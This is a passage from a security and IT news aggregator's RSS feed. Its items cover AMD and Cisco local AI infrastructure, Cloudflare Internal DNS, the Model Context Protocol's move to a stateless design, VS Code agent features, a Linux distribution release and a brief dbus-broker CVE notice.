<p class="wp-block-paragraph">The joint architecture combines AMD’s compact, high-performance Ryzen AI Halo hardware and a variety of Cisco networking, observability, governance, and security technologies. “AMD provides the deskside/local AI platform. At the foundation is AMD Ryzen AI Halo hardware, an isolated agent sandbox and the services needed for local-first inferencing, including model routing and token limits via AMD’s Semantic Router and local inference on Lemonade,” wrote Cisco’s <a href="https://www.linkedin.com/in/yash-sheth-/">Yash Sheth</a>, senior director, engineering and research, in a <a href="https://blogs.cisco.com/ai/from-one-desk-to-the-whole-enterprise-making-local-ai-resilient">blog post</a> about the new package.</p>



<p class="wp-block-paragraph"><a href="https://www.amd.com/en/products/processors/desktops/ryzen/ryzen-ai-halo.html?gad_source=1&amp;gad_campaignid=24009436319&amp;gbraid=0AAAAApk3AUDJs1_xMEd2YjxcG8iJu-gS4&amp;gclid=Cj0KCQjw94bTBhDQARIsAN3vv0xmM9xu9mXa5H5zAbKFqNzUy1FPP5AS-lOA1qXh1a9bmw54LMQtYXgaArV-EALw_wcB">Ryzen AI Halo</a> (pictured below) is designed to support local AI inference on an AI PC using its CPU, GPU, and XDNA neural processing unit (NPU), according to AMD. A resilient AI platform should continue delivering useful AI services even when connectivity is limited, models need to change, or workloads shift, AMD stated.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;</figure><p class="imageCredit">AMD</p></div>



<p class="wp-block-paragraph">Cisco then wraps that platform in a secure harness that includes its Splunk Agent Observability plus Splunk Infrastructure Monitoring to provide full-stack observability, tracking agent behavior, tokenomics and compute operation, according to Sheth.</p>



<p class="wp-block-paragraph">Cisco also brings its <a href="https://www.networkworld.com/article/4148823/cisco-goes-all-in-on-agentic-ai-security.html">AI Defense</a> for model and agent security; <a href="https://www.networkworld.com/article/4179673/cisco-brings-agentic-ops-platform-and-security-overhaul-to-cisco-live.html">DefenseClaw</a> for security policy enforcement, so guardrails are enforced directly on-device, within the agent harness; and <a href="https://www.networkworld.com/article/4180810/what-is-cisco-cloud-control-and-why-should-customers-care.html">Cisco Cloud Control</a> offering a single pane of glass for unified policy and control, Sheth stated.</p>



<p class="wp-block-paragraph">“To make deskside and local AI computing work at enterprise scale, every AI node must be treated as a secure, managed node in the enterprise network,” Sheth wrote.</p>



<p class="wp-block-paragraph">“The need for token efficiency and data sovereignty is driving a new class of computing, deskside computing, with users and teams putting AI agents right by their sides,” Sheth wrote. “Inference is moving to a hybrid architecture with thousands of ambient deskside agents in an enterprise helping employees have 24×7 productivity. That’s an extraordinary opportunity. It’s also a brand-new operating challenge.”</p>



<p class="wp-block-paragraph">As agentic AI moves from experimentation to real enterprise workflows, organizations need more than powerful endpoints. AI agents can run continuously and act on enterprise data, but create new requirements for network infrastructure, tokenomics, agent behavior, and security, according to a <a href="https://newsroom.amd.com/news/aai-2026-cisco-client-partnership-update/">statement</a> from AMD.</p>



<p class="wp-block-paragraph">“Running more AI locally can help improve responsiveness, keep sensitive data closer to users, and reduce dependence on cloud-only approaches, but enterprises also need a way to monitor and manage these systems at scale. AMD and Cisco are addressing that gap by collaborating to pair high-performance local AI compute with the observability, governance, and control infrastructure needed for enterprises to deploy it responsibly,” AMD stated.</p>



<p class="wp-block-paragraph">“By combining AMD Ryzen AI Halo systems and our broader local AI software capabilities with Cisco’s enterprise networking, observability and security technologies, we are helping customers deploy AI in a way that is performant, secure, observable and manageable at scale,” said Jack Huynh, senior vice president and general manager, computing and graphics group with AMD, in a statement.</p>



<p class="wp-block-paragraph">A few other interesting statistics and trends cited in AMD CEO Su’s keynote include:</p>



<ul class="wp-block-list">
<li>AI adoption is accelerating across all industries, with agentic AI driving a surge in compute demand and shifting workloads from training to inference, which accounts for 60% of global AI compute capacity in 2026.</li>



<li>AI is moving beyond the cloud, with edge and personal devices becoming critical for real-time, distributed intelligence.</li>



<li>The AI accelerator market is projected to reach $1.4 trillion by 2030, nearly tripling previous forecasts, with GPUs expected to dominate but CPUs gaining new growth vectors due to agentic AI.</li>



<li>Server CPU market is forecasted to grow over 50% to $200 billion by 2030, fueled by rapid agentic AI adoption and the need for massive CPU infrastructure.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in container-suseconnect (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3692090/unix-server/security-mehrere-probleme-in-container-suseconnect-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692090/unix-server/security-mehrere-probleme-in-container-suseconnect-suse/</guid>
<pubDate>Fri, 24 Jul 2026 18:46:59 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloudflare Internal DNS puts public and private DNS on one policy engine]]></title>
<description><![CDATA[Enterprises typically operate separate systems for internal and external DNS because the two serve different audiences. Public DNS resolves names for services meant to be reached from the internet. Private DNS resolves internal resources, such as databases and internal applications, that should n...]]></description>
<link>https://tsecurity.de/de/3692009/it-security-nachrichten/cloudflare-internal-dns-puts-public-and-private-dns-on-one-policy-engine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692009/it-security-nachrichten/cloudflare-internal-dns-puts-public-and-private-dns-on-one-policy-engine/</guid>
<pubDate>Fri, 24 Jul 2026 18:18:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Enterprises typically operate separate systems for internal and external <a href="https://www.networkworld.com/article/965540/what-is-dns-and-how-does-it-work.html">DNS</a> because the two serve different audiences. Public DNS resolves names for services meant to be reached from the internet. Private DNS resolves internal resources, such as databases and internal applications, that should never be visible outside the corporate network. </p>



<p class="wp-block-paragraph">While public DNS is usually a single system, private DNS is often scattered across on-premises appliances, cloud-native resolvers, and split-horizon setups, where the same hostname resolves to a different answer depending on whether the query comes from inside or outside the network. Coordinating those deployments across headquarters, branch offices, and multiple clouds means <a href="https://www.networkworld.com/article/4158134/dns-security-is-often-inadequate-and-network-engineers-should-get-more-involved.html">ongoing manual synchronization work</a> for network teams. </p>



<p class="wp-block-paragraph">Private DNS itself is not a new concept. It is already available from hyperscalers and established enterprise DNS vendors, but it typically runs apart from public DNS, with its own console, control plane and policy engine.</p>



<p class="wp-block-paragraph">Cloudflare’s answer is a product it calls Internal DNS.</p>



<p class="wp-block-paragraph">“Many organizations already use Cloudflare for their public DNS,” <a href="https://www.linkedin.com/in/enriquesomoza/">Enrique Somoza</a>, product, performance and infrastructure at Cloudflare, told<em> Network World</em>. “Internal DNS extends that same platform to private DNS, so public and private are managed from the same global network and control plane.” </p>



<h2 class="wp-block-heading">How it works</h2>



<p class="wp-block-paragraph">Query handling starts at the resolver, not at the zone. That consolidation extends to daily operations as well.</p>



<p class="wp-block-paragraph">“Instead of operating two separate DNS systems, customers use one API, one audit trail, one dashboard, and one policy engine for every DNS query—whether it is for a public website or an internal application,” Somoza said.</p>



<p class="wp-block-paragraph"><strong>Policy first.</strong> The resolver sits ahead of every lookup, not behind it. “Architecturally, Cloudflare Gateway becomes the resolver that customers connect to, and can use WARP, DNS over HTTPS, DNS over TLS, or traditional DNS,” Somoza said. “Gateway evaluates zero -trust policies first, then routes the query to the appropriate DNS view based on context, such as source IP, device posture, or network location.”</p>



<p class="wp-block-paragraph"><strong>No public path in.</strong> Internal zones sit outside the public DNS hierarchy entirely. “Internal zones are never assigned public nameservers—they are only reachable through Gateway, so every query is evaluated before it is resolved,” Somoza said.</p>



<p class="wp-block-paragraph"><strong>One hostname, multiple answers.</strong> Branch offices, data centers and cloud environments no longer each need their own resolver stack. “Operationally, this simplifies environments that span branch offices, data centers, and multiple clouds,” Somoza said. “The same internal hostname can return different answers depending on where the request originated without maintaining separate resolver infrastructure, conditional forwarders, or duplicate zone files.”</p>



<p class="wp-block-paragraph">Somoza described the underlying objective in direct terms: “The goal is to make internal DNS behave like a single service instead of a collection of independent deployments,” he said.</p>



<p class="wp-block-paragraph"><strong>View selection.</strong> The same hostname can resolve to different IP addresses depending on where the request comes from. Gateway makes that call using several client signals. </p>



<p class="wp-block-paragraph">“View selection is policy driven,” Somoza said. “Gateway resolver policies evaluate the context of each DNS query, including attributes like source IP, device identity, or network location and determine which DNS view should answer the request.”</p>



<p class="wp-block-paragraph">A view is a container, not a separate infrastructure stack. Somoza explained that a view is simply a logical grouping of internal zones. For example, a company could have separate views for Europe and North America, or for corporate users and operational technology networks.</p>



<p class="wp-block-paragraph"><strong>Latency and resilience.</strong> Internal DNS inherits its performance characteristics from Cloudflare’s existing public network. “Internal DNS runs on Cloudflare’s global network, so queries are answered by the nearest available Gateway location, helping keep latency low for connected users,” Somoza said. “Because Internal DNS runs on the same global infrastructure as Cloudflare’s public DNS, it benefits from the same anycast architecture, geographic distribution, and resilient network design.”</p>



<h2 class="wp-block-heading">How this differs from split-horizon DNS</h2>



<p class="wp-block-paragraph">Internal DNS replaces the duplicate-zone model traditional split-horizon setups depend on.</p>



<p class="wp-block-paragraph">“Before migrating, many organizations maintain multiple versions of the same internal DNS zones across headquarters, branch offices, and cloud environments,” Somoza explained. “Conditional forwarders determine which resolver answers each query, and keeping those environments synchronized becomes an ongoing operational task.”</p>



<p class="wp-block-paragraph">Internal DNS collapses those duplicate zones into a single authoritative copy split across views instead. “With Internal DNS, that configuration becomes much simpler,” Somoza said. “A customer might create a single corp.internal zone in Cloudflare and define multiple DNS views.”</p>



<p class="wp-block-paragraph">For example, users in headquarters could receive one internal IP address for wiki.corp.internal, while branch offices receive a different address. Somoza emphasized that the zone itself only exists once. “Instead of maintaining multiple copies of the same configuration, administrators manage a single source of truth,” he said.</p>



<h2 class="wp-block-heading">Early use cases and migration challenges</h2>



<p class="wp-block-paragraph">Not surprisingly, Somoza noted that the first use case Cloudflare sees for Internal DNS is for split-horizon DNS consolidation. There is also interest from organizations that operate across multiple cloud providers that want one consistent internal DNS service instead of managing separate DNS platforms in each environment.</p>



<p class="wp-block-paragraph">Another common use case is extending zero-trust policies to internal name resolution. “Customers already use Gateway to control access to internet traffic, and Internal DNS lets them apply similar policy decisions before internal names are resolved,” Somoza said.</p>



<p class="wp-block-paragraph">When it comes to migration, the friction customers report during migration is procedural rather than architectural. </p>



<p class="wp-block-paragraph">“Customers need to think through API permissions, connectivity, and how existing local DNS forwarding rules interact with Gateway,” Somoza said. “Those are all well understood migration steps and customers often run both environments in parallel before completing the transition.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: Shadowfetch Linux 2.0.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The Shadowfetch Linux distribution is a Debian-based project which features the Plasma desktop. The latest release of Shadowfetch, version 2.0.0, enables automatic Btrfs snapshots prior to package changes, making rolling back to wo...]]></description>
<link>https://tsecurity.de/de/3691977/unix-server/distribution-release-shadowfetch-linux-200/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691977/unix-server/distribution-release-shadowfetch-linux-200/</guid>
<pubDate>Fri, 24 Jul 2026 18:02:21 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The Shadowfetch Linux distribution is a Debian-based project which features the Plasma desktop. The latest release of Shadowfetch, version 2.0.0, enables automatic Btrfs snapshots prior to package changes, making rolling back to working snapshots easier. The project has also revamped its welcome screen. "Boot straight into a working....]]></content:encoded>
</item>
<item>
<title><![CDATA[Model Context Protocol is going stateless to make scaling simpler]]></title>
<description><![CDATA[Model Context Protocol (MCP), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.



The latest release candidate, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless arch...]]></description>
<link>https://tsecurity.de/de/3691919/ai-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691919/ai-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</guid>
<pubDate>Fri, 24 Jul 2026 17:40:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.</p>



<p class="wp-block-paragraph">The latest <a href="https://modelcontextprotocol.io/specification/draft/changelog" target="_blank" rel="noreferrer noopener">release candidate</a>, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless architecture, a change which industry experts say is intended to make MCP easier to deploy across standard cloud infrastructure as enterprises move AI pilots into production.</p>



<p class="wp-block-paragraph">“The session-based model made sense when MCP servers were local processes on a developer’s laptop. In production, it became an operational tax,” said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at ZopDev.</p>



<p class="wp-block-paragraph">“When your infrastructure team asks whether MCP services can scale like other cloud applications, the answer used to be ‘not quite.’ With the move to a stateless architecture, the answer is now yes,” Bandta added.</p>



<p class="wp-block-paragraph">Earlier versions of the protocol maintained information about every client connection, meaning servers had to keep track of each session throughout an interaction. While that approach worked well for local development, it complicated deployments across multiple servers because requests often had to be routed back to the same machine, limiting scalability and making MCP a less natural fit for modern cloud architectures.</p>



<p class="wp-block-paragraph">“Under the new stateless design, every request contains the information needed for any available server to process it independently. Applications that need to maintain context across multiple requests can still do so, but developers must now manage that state explicitly rather than relying on the protocol itself,” she said.</p>



<p class="wp-block-paragraph">This transition to a stateless design goes beyond simplifying infrastructure by fundamentally changing how AI applications manage and share context across tools, according to <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">Instead of keeping application state hidden inside protocol sessions, the new design makes it explicit, allowing AI models to access, reason over, and pass that information between tools, giving developers greater control over how context is preserved and shared across tools, Jena said.</p>



<p class="wp-block-paragraph">It should also make AI workflows more portable, resilient, and easier to orchestrate across distributed environments, he said.</p>



<h2 class="wp-block-heading">MCP’s new features</h2>



<p class="wp-block-paragraph">Other changes to MCP include the addition of a Multi Round-Trip Requests (MRTR) mechanism that changes how AI agents request additional information they need to complete a task.</p>



<p class="wp-block-paragraph">Instead of relying on a persistent connection between the client and server throughout the interaction, the new mechanism lets the server request additional input through a standard request-response exchange before continuing the task, Jena said.</p>



<p class="wp-block-paragraph">Routable transport headers, another addition, enable API gateways and other networking infrastructure to identify and route MCP requests without inspecting their contents.</p>



<p class="wp-block-paragraph">They reduce processing overhead, lower latency, and let enterprise teams enforce routing, rate-limiting and security policies more efficiently using existing API management infrastructure, Jena said.</p>



<p class="wp-block-paragraph">MCP is also getting an updated authorization framework built around OAuth 2.1 and OpenID Connect; interactive MCP Apps; and deterministic caching of tool and resource listings to improve LLM prompt-cache hit rates, potentially saving on token costs.</p>



<h2 class="wp-block-heading">Rebuilding the trust boundary</h2>



<p class="wp-block-paragraph">The MCP release steering committee also decided to deprecate some legacy features, including Roots, Sampling, Logging, the older HTTP+SSE transport and Dynamic Client Registration, although these will continue to work in this version and any other released over the next year.</p>



<p class="wp-block-paragraph">The deprecation of Sampling is likely to have the biggest impact because it changes who is responsible for interacting with foundation models, said Jena.</p>



<p class="wp-block-paragraph">“Sampling let MCP servers invoke the <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" target="_blank">LLM</a> through the client, which meant the server had a callback path into the model without owning that connection. Deprecating it means rebuilding that trust boundary,” Jena said. “Your server now calls the model provider directly. That changes your network architecture, your auth model, and depending on how you’ve built cost attribution, your billing flow.”</p>



<p class="wp-block-paragraph">The year-long transition period will be enough for teams to audit their sampling dependencies now, said Jena: “The risk is that teams who haven’t implemented sampling themselves won’t know if a third-party MCP server they’re depending on uses it.”</p>



<h2 class="wp-block-heading">Updated MCP SDKs</h2>



<p class="wp-block-paragraph">To accompany the protocol update, there are updated <a href="https://github.com/modelcontextprotocol" target="_blank" rel="noreferrer noopener">MCP SDKs</a> for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html" target="_blank">Python</a>, <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" target="_blank">Typescript</a>, <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>, and <a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>. These support both the old and new protocol versions, so new clients can continue communicating with older servers, while updated servers will also support older clients, reducing the risk of immediate disruptions.</p>



<p class="wp-block-paragraph">That backward compatibility should make the transition largely incremental, except for enterprises that built custom infrastructure around MCP’s earlier session-based architecture, Bandta said.</p>



<p class="wp-block-paragraph">Identifying and auditing those session dependencies may not be easy, Jena warned.</p>



<p class="wp-block-paragraph">“Session management complexity tends to be hidden across multiple layers — the gateway config, the deployment scripts, the monitoring dashboards. The code change is small; finding everywhere the assumption lives is what takes time,” he said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Model Context Protocol is going stateless to make scaling simpler]]></title>
<description><![CDATA[Model Context Protocol (MCP), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.



The latest release candidate, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless arch...]]></description>
<link>https://tsecurity.de/de/3691907/it-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691907/it-nachrichten/model-context-protocol-is-going-stateless-to-make-scaling-simpler/</guid>
<pubDate>Fri, 24 Jul 2026 17:38:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>), the emerging standard for connecting AI models to external tools and enterprise data, is undergoing its biggest architectural overhaul yet.</p>



<p class="wp-block-paragraph">The latest <a href="https://modelcontextprotocol.io/specification/draft/changelog" target="_blank" rel="noreferrer noopener">release candidate</a>, scheduled for release on July 28, removes protocol-level sessions in favor of a stateless architecture, a change which industry experts say is intended to make MCP easier to deploy across standard cloud infrastructure as enterprises move AI pilots into production.</p>



<p class="wp-block-paragraph">“The session-based model made sense when MCP servers were local processes on a developer’s laptop. In production, it became an operational tax,” said <a href="https://www.linkedin.com/in/muskan-bandta2004" target="_blank" rel="noreferrer noopener">Muskan Bandta</a>, cloud associate at ZopDev.</p>



<p class="wp-block-paragraph">“When your infrastructure team asks whether MCP services can scale like other cloud applications, the answer used to be ‘not quite.’ With the move to a stateless architecture, the answer is now yes,” Bandta added.</p>



<p class="wp-block-paragraph">Earlier versions of the protocol maintained information about every client connection, meaning servers had to keep track of each session throughout an interaction. While that approach worked well for local development, it complicated deployments across multiple servers because requests often had to be routed back to the same machine, limiting scalability and making MCP a less natural fit for modern cloud architectures.</p>



<p class="wp-block-paragraph">“Under the new stateless design, every request contains the information needed for any available server to process it independently. Applications that need to maintain context across multiple requests can still do so, but developers must now manage that state explicitly rather than relying on the protocol itself,” she said.</p>



<p class="wp-block-paragraph">This transition to a stateless design goes beyond simplifying infrastructure by fundamentally changing how AI applications manage and share context across tools, according to <a href="https://www.linkedin.com/in/znamit/" target="_blank" rel="noreferrer noopener">Amit Jena</a>, AI development manager at IT consulting firm Kanerika.</p>



<p class="wp-block-paragraph">Instead of keeping application state hidden inside protocol sessions, the new design makes it explicit, allowing AI models to access, reason over, and pass that information between tools, giving developers greater control over how context is preserved and shared across tools, Jena said.</p>



<p class="wp-block-paragraph">It should also make AI workflows more portable, resilient, and easier to orchestrate across distributed environments, he said.</p>



<h2 class="wp-block-heading">MCP’s new features</h2>



<p class="wp-block-paragraph">Other changes to MCP include the addition of a Multi Round-Trip Requests (MRTR) mechanism that changes how AI agents request additional information they need to complete a task.</p>



<p class="wp-block-paragraph">Instead of relying on a persistent connection between the client and server throughout the interaction, the new mechanism lets the server request additional input through a standard request-response exchange before continuing the task, Jena said.</p>



<p class="wp-block-paragraph">Routable transport headers, another addition, enable API gateways and other networking infrastructure to identify and route MCP requests without inspecting their contents.</p>



<p class="wp-block-paragraph">They reduce processing overhead, lower latency, and let enterprise teams enforce routing, rate-limiting and security policies more efficiently using existing API management infrastructure, Jena said.</p>



<p class="wp-block-paragraph">MCP is also getting an updated authorization framework built around OAuth 2.1 and OpenID Connect; interactive MCP Apps; and deterministic caching of tool and resource listings to improve LLM prompt-cache hit rates, potentially saving on token costs.</p>



<h2 class="wp-block-heading">Rebuilding the trust boundary</h2>



<p class="wp-block-paragraph">The MCP release steering committee also decided to deprecate some legacy features, including Roots, Sampling, Logging, the older HTTP+SSE transport and Dynamic Client Registration, although these will continue to work in this version and any other released over the next year.</p>



<p class="wp-block-paragraph">The deprecation of Sampling is likely to have the biggest impact because it changes who is responsible for interacting with foundation models, said Jena.</p>



<p class="wp-block-paragraph">“Sampling let MCP servers invoke the <a href="https://www.infoworld.com/article/2335213/large-language-models-the-foundations-of-generative-ai.html" target="_blank">LLM</a> through the client, which meant the server had a callback path into the model without owning that connection. Deprecating it means rebuilding that trust boundary,” Jena said. “Your server now calls the model provider directly. That changes your network architecture, your auth model, and depending on how you’ve built cost attribution, your billing flow.”</p>



<p class="wp-block-paragraph">The year-long transition period will be enough for teams to audit their sampling dependencies now, said Jena: “The risk is that teams who haven’t implemented sampling themselves won’t know if a third-party MCP server they’re depending on uses it.”</p>



<h2 class="wp-block-heading">Updated MCP SDKs</h2>



<p class="wp-block-paragraph">To accompany the protocol update, there are updated <a href="https://github.com/modelcontextprotocol" target="_blank" rel="noreferrer noopener">MCP SDKs</a> for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html" target="_blank">Python</a>, <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" target="_blank">Typescript</a>, <a href="https://www.infoworld.com/article/2253031/whats-the-go-language-really-good-for-3.html">Go</a>, and <a href="https://www.infoworld.com/article/4131649/the-best-new-features-of-c-14.html">C#</a>. These support both the old and new protocol versions, so new clients can continue communicating with older servers, while updated servers will also support older clients, reducing the risk of immediate disruptions.</p>



<p class="wp-block-paragraph">That backward compatibility should make the transition largely incremental, except for enterprises that built custom infrastructure around MCP’s earlier session-based architecture, Bandta said.</p>



<p class="wp-block-paragraph">Identifying and auditing those session dependencies may not be easy, Jena warned.</p>



<p class="wp-block-paragraph">“Session management complexity tends to be hidden across multiple layers — the gateway config, the deployment scripts, the monitoring dashboards. The code change is small; finding everywhere the assumption lives is what takes time,” he said.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.infoworld.com/article/4201254/model-context-protocol-is-going-stateless-to-make-scaling-simpler.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[De Vlieger: The Fedora 45 sausage factory]]></title>
<description><![CDATA[Fedora contributor Simon de Vlieger has published a blog
post with a walkthrough of how the project turns source code and
packages into the final release that users install on their systems.


It follows the a package from a packager's git push to a composed
release: ISOs, cloud images, container...]]></description>
<link>https://tsecurity.de/de/3691877/linux-tipps/de-vlieger-the-fedora-45-sausage-factory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691877/linux-tipps/de-vlieger-the-fedora-45-sausage-factory/</guid>
<pubDate>Fri, 24 Jul 2026 17:15:45 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Fedora contributor Simon de Vlieger has published a <a href="https://supakeen.com/weblog/the-fedora-45-sausage-factory/">blog
post</a> with a walkthrough of how the project turns source code and
packages into the final release that users install on their systems.</p>

<blockquote class="bq">
<p>It follows the a package from a packager's git push to a composed
release: ISOs, cloud images, container images, and OSTree
deployments.</p>

<p>The walkthrough describes how the Fedora 'sausage' is created as of
Fedora 45, things change all the time; I hope to have time to update
this document every cycle or every few cycles of Fedora releases so
there's both history and people can find up to date information.</p>
</blockquote>

<p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Visual Studio Code 1.130 dresses up Agents window]]></title>
<description><![CDATA[Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.



VS Code 1.130 was released on July 22, one week after VS Code 1.129. Developers can access the releas...]]></description>
<link>https://tsecurity.de/de/3691858/ai-nachrichten/visual-studio-code-1130-dresses-up-agents-window/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691858/ai-nachrichten/visual-studio-code-1130-dresses-up-agents-window/</guid>
<pubDate>Fri, 24 Jul 2026 17:00:02 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Microsoft has released Visual Studio Code 1.130, an update to the code editor that brings several improvements to the Agents window, along with enhancements to the agent host and the terminal.</p>



<p class="wp-block-paragraph">VS Code 1.130 was released on <a href="https://code.visualstudio.com/updates/v1_130#_agents-window-improvements-preview">July 22</a>, one week after <a href="https://www.infoworld.com/article/4199680/visual-studio-code-1-129-introduces-dedicated-agent-host.html">VS Code 1.129</a>. Developers can access the release for Windows, Linux, or Mac from <a href="https://code.visualstudio.com/Download?_exp_download=fb315fc982">code.visualstudio.com</a>. </p>



<p class="wp-block-paragraph">With the new release, the <a href="https://code.visualstudio.com/docs/agents/agents-window">Agents window</a> gets updates that make it easier to review changes and manage chats. File-level diff statistics help users assess the size of each file’s changes when scanning a multi-file diff. The window also gets a more compact multi-file diff that makes it easier to review changes, Microsoft said. The Agents window is a dedicated window in VS Code that lets users run and track multiple agent sessions in parallel across their projects, without opening each workspace in a separate window.</p>



<p class="wp-block-paragraph">Also with VS Code 1.130, assisted permissions for agent tool calls are available in the <a href="https://code.visualstudio.com/updates/v1_130#_the-agent-host" data-type="link" data-id="https://code.visualstudio.com/updates/v1_130#_the-agent-host">agent host</a>. With assisted permissions, the LLM evaluates the risk of each tool call and decides whether the tool can run or should require the user’s approval. The setting to enable assisted permissions is <code>chat.assistedPermissions.enabled</code>. In another agent host improvement, quick chats running on the agent host now use compact, single-line rows in the sessions list. Regular sessions retain a second line with change statistics, status, and timestamps. </p>



<p class="wp-block-paragraph">VS Code users now can open file links from Git diff output in the terminal when Git’s <a href="https://git-scm.com/docs/diff-config#Documentation/diff-config.txt-diffmnemonicPrefix" target="_blank" rel="noreferrer noopener"><code>diff.mnemonicPrefix</code></a> option is enabled. VS Code recognizes prefixes such as<code> i/</code> for the index and <code>w/</code> for the working tree, and removes the prefix from the link target so the correct file opens. When mnemonic prefixes are enabled, VS Code also recognizes the numeric prefixes produced by <code>git diff --no-index</code>.</p>



<p class="wp-block-paragraph">Timestamps for chat requests and responses now are displayed when users hover over the message toolbar. You can disable this through the <code>chat.verbose</code> setting. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-16730 | Red Hat Enterprise Linux/OpenShift Container Platform dbus-broker resource consumption (EUVD-2026-48559)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in Red Hat Enterprise Linux and OpenShift Container Platform. This impacts an unknown function of the component dbus-broker. This manipulation causes resource consumption.

This vulnerability is tracked as CVE-2026-16730. The attack is restrict...]]></description>
<link>https://tsecurity.de/de/3691757/sicherheitsluecken/cve-2026-16730-red-hat-enterprise-linuxopenshift-container-platform-dbus-broker-resource-consumption-euvd-2026-48559/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691757/sicherheitsluecken/cve-2026-16730-red-hat-enterprise-linuxopenshift-container-platform-dbus-broker-resource-consumption-euvd-2026-48559/</guid>
<pubDate>Fri, 24 Jul 2026 16:08:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/red_hat:enterprise_linux">Red Hat Enterprise Linux and OpenShift Container Platform</a>. This impacts an unknown function of the component <em>dbus-broker</em>. This manipulation causes resource consumption.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-16730">CVE-2026-16730</a>. The attack is restricted to local execution. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[DEF CON Middle East Postponed]]></title>
<description><![CDATA[The safety of our community is our highest priority.
